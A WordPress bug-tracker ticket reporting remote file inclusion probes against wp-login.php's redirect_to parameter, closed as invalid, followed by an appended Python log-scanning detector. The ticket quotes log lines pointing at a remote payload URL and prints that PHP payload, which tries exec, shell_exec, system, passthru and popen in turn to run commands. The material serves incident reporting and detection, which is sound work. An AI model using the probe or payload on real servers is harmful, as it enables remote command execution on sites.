WordPress.org

Make WordPress Core

Opened 6 years ago

Closed 6 years ago

#5548 closed defect (bug) (invalid)

Hacking attempt.

Reported by: mylesab
Owned by:
Milestone:
Priority: normal
Severity: normal
Version:
Component: Security
Keywords:
Focuses:
Cc:

Description

Today I noticed the following entries in my log:

80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006/microid-wordpress-plugin//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2066 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"

When I curl the id.txt file I got the following:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Change History (2)

comment:1 ryan 6 years ago

Not sure what they're trying to accomplish with this. redirect_to doesn't do an include. Also, we block attempts to launder links through redirect_to.

comment:2 JeremyVisser 6 years ago

  • Milestone 2.5 deleted
  • Resolution set to invalid
  • Status changed from new to closed

This is not really a proper bug report, nor anything that should concern WordPress users. All WP blogs get hammered by useless $cript k1dd1e bots that really don't get anywhere.
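
A log check for the probe pattern in the entries quoted in the description, as an added example that is not part of the ticket or of WordPress: it flags requests whose query parameter carries an absolute remote URL and records the trailing "?", the doubled slash and the scripted user agent seen in those entries. The sample lines are constructed (documentation IPs and example hosts), and the function names are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format, the format of the entries quoted in the ticket.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
REMOTE_URL = re.compile(r'(?i)^(?:https?|ftp)://')
SCRIPTED_AGENT = re.compile(r'(?i)libwww-perl|^-?$')  # library client or empty agent


def classify(line):
    """Return a finding dict for a remote-URL parameter probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split by hand: urlsplit() would read a leading "//" as a network location.
    path, _, query = m['target'].partition('?')
    # parse_qsl percent-decodes, so an encoded http%3A%2F%2F value is caught too.
    remote = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
              if REMOTE_URL.match(v)]
    if not remote:
        return None
    return {
        'ip': m['ip'],
        'status': int(m['status']),
        'params': [k for k, _ in remote],
        # A trailing "?" on the supplied URL is a common marker of include probes.
        'trailing_qmark': any(v.endswith('?') for _, v in remote),
        'double_slash': '//' in path,
        'scripted_agent': bool(SCRIPTED_AGENT.search(m['agent'])),
    }


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


# Constructed sample lines modelled on the ticket's entries (documentation IPs/hosts).
SAMPLE = [
    '192.0.2.10 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://files.example.net/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006//wp-login.php?redirect_to=http%3A%2F%2Ffiles.example.net%2Fid.txt%3F HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [29/Dec/2007:12:20:01 -0600] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 2010 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A finding records that a probe was sent, not that it worked; the logged status code alone does not distinguish the two.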
